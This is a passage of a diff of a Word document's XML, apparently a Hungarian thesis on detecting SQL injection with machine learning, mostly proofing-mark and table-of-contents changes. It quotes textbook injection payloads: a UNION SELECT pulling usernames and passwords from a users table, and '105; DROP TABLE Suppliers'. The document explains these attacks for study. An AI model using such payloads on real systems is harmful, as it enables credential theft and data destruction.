+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>beli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1015,6 +1199,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1023,6 +1208,7 @@
         </w:rPr>
         <w:t>IntelliJ</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1316,8 +1502,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> train/test készlet,</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1326,8 +1513,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1336,7 +1524,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Fold</w:t>
+        <w:t>/test készlet,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1346,7 +1534,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1356,7 +1544,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>c</w:t>
+        <w:t>K-Fold</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1366,8 +1554,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">onfusion mátrix, </w:t>
-      </w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1376,7 +1565,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>r</w:t>
+        <w:t>c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1386,8 +1575,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ecal</w:t>
-      </w:r>
+        <w:t>onfusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1396,8 +1586,40 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> mátrix, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ecal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>l</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1457,7 +1679,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc71019990"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc71124905"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1509,7 +1731,7 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc71019988" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124903" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1537,7 +1759,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019988 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124903 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1582,7 +1804,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019989" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124904" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1610,7 +1832,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019989 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124904 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1655,7 +1877,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019990" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124905" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1683,7 +1905,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019990 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124905 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1728,7 +1950,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019991" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124906" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1756,7 +1978,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019991 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124906 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1802,7 +2024,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019992" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124907" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1846,7 +2068,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019992 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124907 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1892,7 +2114,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019993" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124908" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1938,7 +2160,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019993 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124908 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1984,7 +2206,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019994" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124909" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2028,7 +2250,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019994 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124909 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2074,7 +2296,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019995" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124910" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2118,7 +2340,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019995 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124910 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2164,7 +2386,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019996" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124911" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2208,7 +2430,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019996 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124911 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2254,7 +2476,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019997" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124912" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2300,7 +2522,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019997 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124912 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2346,7 +2568,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019998" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124913" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2390,7 +2612,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019998 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124913 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2436,7 +2658,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71019999" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124914" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2482,7 +2704,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71019999 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124914 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2528,7 +2750,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020000" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124915" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2551,7 +2773,7 @@
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Naive Bayes</w:t>
+              <w:t>Gaussian Naive Bayes</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2572,7 +2794,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020000 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124915 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2592,7 +2814,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2618,7 +2840,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020001" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124916" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2662,7 +2884,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020001 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124916 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2682,7 +2904,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2708,7 +2930,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020002" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124917" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2752,7 +2974,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020002 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124917 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2772,7 +2994,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2797,7 +3019,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020003" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124918" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2825,7 +3047,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020003 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124918 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2845,7 +3067,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2870,7 +3092,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020004" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124919" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2898,7 +3120,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020004 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124919 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2918,7 +3140,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2943,7 +3165,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71020005" w:history="1">
+          <w:hyperlink w:anchor="_Toc71124920" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2971,7 +3193,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71020005 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71124920 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2991,7 +3213,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3052,7 +3274,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc71019991"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc71124906"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3372,7 +3594,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc71019992"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc71124907"/>
       <w:r>
         <w:t>SQL INJECTION</w:t>
       </w:r>
@@ -3397,7 +3619,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A téma</w:t>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>téma</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3405,6 +3634,7 @@
         </w:rPr>
         <w:t>megnevezés</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -3473,7 +3703,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>The Open Web Application Security Project</w:t>
+        <w:t xml:space="preserve">The Open Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Project</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3643,7 +3901,52 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>' UNION SELECT username, password FROM user</w:t>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>user</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3653,6 +3956,7 @@
         </w:rPr>
         <w:t>s</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3709,6 +4013,7 @@
         </w:rPr>
         <w:t xml:space="preserve">létezik </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3717,12 +4022,14 @@
         </w:rPr>
         <w:t>users</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> tábla, valamint </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3731,12 +4038,14 @@
         </w:rPr>
         <w:t>username</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> és </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3745,6 +4054,7 @@
         </w:rPr>
         <w:t>password</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -3763,8 +4073,144 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>products</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = ’</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Gifts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">’ UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -3868,7 +4314,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc71019993"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc71124908"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3894,7 +4340,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc71019994"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc71124909"/>
       <w:r>
         <w:t>Sávon belüli</w:t>
       </w:r>
@@ -3902,18 +4348,33 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-band</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, classic</w:t>
-      </w:r>
+        <w:t>(in-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>classic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4193,8 +4654,18 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>105; DROP TABLE Suppliers</w:t>
-      </w:r>
+        <w:t xml:space="preserve">105; DROP TABLE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Suppliers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -4274,6 +4745,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4282,6 +4754,7 @@
         </w:rPr>
         <w:t>Users</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4306,6 +4779,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4314,6 +4788,7 @@
         </w:rPr>
         <w:t>UserId</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4386,6 +4861,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4410,6 +4886,7 @@
         </w:rPr>
         <w:t>ppliers</w:t>
       </w:r>
